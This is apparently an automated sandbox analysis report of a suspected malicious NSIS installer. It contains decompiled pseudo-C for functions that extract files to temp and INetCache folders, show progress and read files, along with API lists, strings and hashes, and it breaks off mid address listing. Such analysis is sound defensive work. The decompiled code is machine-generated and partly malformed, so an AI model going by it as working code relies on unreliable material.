String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-895301406
Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C37(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405BCA( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405B53(E00406282(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry\\Agrafferne")), ??);
				} else {
					E00406282();
				}
				E00406516(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004065C5(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D4F(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D74(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052E6(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E00406282("C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp", _t81);
						E00406282(_t81, _t84);
						E004062A4(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E00406282(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp");
						_t64 = E004058E4("C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052E6();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052E6(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fb4 =  *0x434fb4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x30));
				_push( *((intOrPtr*)(_t86 - 0x20)));
				_t45 = E004030FA(); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004062A4(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E004062A4(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E004058E4();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x00402885
0x00402885
0x00402abf
0x00402ac2
0x00402ac2
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402ac8
0x00402ac8
0x00402ac8
0x00401867
0x00401867
0x00401868
0x00401493
0x004022f1
0x004022f1
0x004022f1
0x00401865
0x0040185e
0x00402aca
0x00402ace
0x00402ace
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x004022ec
0x00000000
0x004022ec
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne,?,?,00000031), ref: 004017D5

Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F

Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,0040325E), ref: 00405341
Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll), ref: 00405353
Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1

Strings

C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsbA35F.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Agrafferne$C:\Users\user\AppData\Local\Temp\nsbA35F.tmp$C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll$Call
API String ID: 1941528284-1075994806
Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004052E6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004052E6(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ec4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004062A4(_t38, 0, 0x42c228, 0x42c228, _a4);
					}
					_t27 = lstrlenW(0x42c228);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ea8, 0x42c228); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c228;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c228[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c228, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004052ec
0x004052f6
0x004052fb
0x00405301
0x0040530c
0x0040530f
0x00405312
0x00405318
0x00405318
0x0040531e
0x00405326
0x00405329
0x00405346
0x0040534a
0x00405353
0x00405353
0x0040535d
0x00405366
0x00405372
0x00405379
0x0040537d
0x00405380
0x00405393
0x004053a1
0x004053a1
0x004053a5
0x004053a7
0x004053aa
0x00000000
0x004053aa
0x0040532b
0x00405333
0x0040533b
0x00405341
0x00000000
0x00405341
0x0040533b
0x00405329
0x004053b6

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000,0041D800,755223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,0040325E), ref: 00405341
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll), ref: 00405353
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll, xrefs: 00405307, 00405317, 0040531D, 00405340, 0040534C

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll
API String ID: 2531174081-1613315971
Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004030FA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x41aa00;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E0040332B( *0x434f58 + _t62);
				}
				if(E00403315( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E00403315(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E00403315(0x416a00, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405E26(_a8, 0x416a00, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d364 =  *0x40d364 & 0x00000000;
					 *0x40d360 =  *0x40d360 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce48 = 8;
					 *0x4169f0 = 0x40e9e8;
					 *0x4169ec = 0x40e9e8;
					 *0x4169e8 = 0x4169e8;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403315(0x416a00, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce38 = 0x416a00;
						 *0x40ce3c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce40 = _t95;
							 *0x40ce44 = _v12;
							_t75 = E004067BD(0x40ce38);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce40; // 0x41d800
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E004052E6(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce40; // 0x41d800
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405E26(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x00403105
0x00403109
0x0040310c
0x00403111
0x00403113
0x00403113
0x0040311a
0x0040311e
0x00403123
0x00403125
0x00403125
0x0040312c
0x00403131
0x0040313c
0x0040313c
0x0040314e
0x00403303
0x00403303
0x00000000
0x00403154
0x00403158
0x004032b0
0x004032f3
0x004032f5
0x004032f5
0x00403301
0x00403308
0x0040330b
0x00000000
0x00000000
0x00000000
0x00000000
0x00403301
0x004032b5
0x00000000
0x00000000
0x004032b7
0x004032ba
0x004032bd
0x004032c0
0x004032c2
0x004032c2
0x004032d2
0x00000000
0x00000000
0x004032d9
0x004032e0
0x004032aa
0x004032aa
0x00403305
0x00403305
0x00000000
0x00403305
0x004032e2
0x004032e5
0x004032ec
0x00000000
0x00000000
0x00000000
0x004032ee
0x00000000
0x004032ba
0x00403164
0x00403166
0x0040316d
0x00403174
0x00403174
0x0040317b
0x00403183
0x0040318d
0x00403192
0x0040319a
0x004031a4
0x004031a7
0x00000000
0x00000000
0x00000000
0x00000000
0x004031ad
0x004031ad
0x004031ad
0x004031b5
0x004031b7
0x004031b7
0x004031c8
0x00000000
0x00000000
0x004031ce
0x004031d1
0x004031d7
0x004031dd
0x004031dd
0x004031e8
0x004031ee
0x004031f3
0x004031fa
0x004031fd
0x00000000
0x00000000
0x00403203
0x00403209
0x0040320b
0x00403214
0x00403216
0x00403247
0x0040324d
0x00403259
0x0040325e
0x0040325e
0x00403263
0x0040329e
0x00000000
0x00000000
0x00000000
0x00403265
0x00403269
0x00403280
0x00403285
0x00403288
0x0040328b
0x0040328e
0x00403292
0x00000000
0x00000000
0x00000000
0x00403298
0x00403272
0x00403279
0x00000000
0x00000000
0x0040327b
0x00000000
0x0040327b
0x00403263
0x004032a6
0x00000000
0x004032a6
0x00000000
0x004031ad

APIs

GetTickCount.KERNEL32 ref: 00403164
GetTickCount.KERNEL32 ref: 0040320B
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403234
wsprintfW.USER32 ref: 00403247

Strings

@, xrefs: 0040317E
... %d%%, xrefs: 00403241

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$@
API String ID: 551687249-3859443358
Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C15(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E004061E2(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E55( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405DF7( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004061C9( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x00402644
0x00402646
0x00402649
0x0040264b
0x0040264e
0x00402653
0x00402657
0x0040265a
0x0040265d
0x00402abf
0x00402ac2
0x00402663
0x00402663
0x0040266a
0x0040266c
0x0040266c
0x00402672
0x004027d6
0x004027d6
0x004027d9
0x004027de
0x004015b6
0x00402885
0x00402885
0x00000000
0x00402678
0x00402679
0x00402684
0x00402687
0x00402693
0x00402697
0x0040272f
0x00402747
0x00402757
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040269d
0x0040269d
0x004026a0
0x004026a1
0x004026a4
0x004026a9
0x004026b0
0x004026b8
0x00000000
0x004026be
0x004026be
0x004026c3
0x00000000
0x004026c9
0x004026c9
0x004026d1
0x004026d4
0x004026d7
0x00402792
0x00402799
0x004026dd
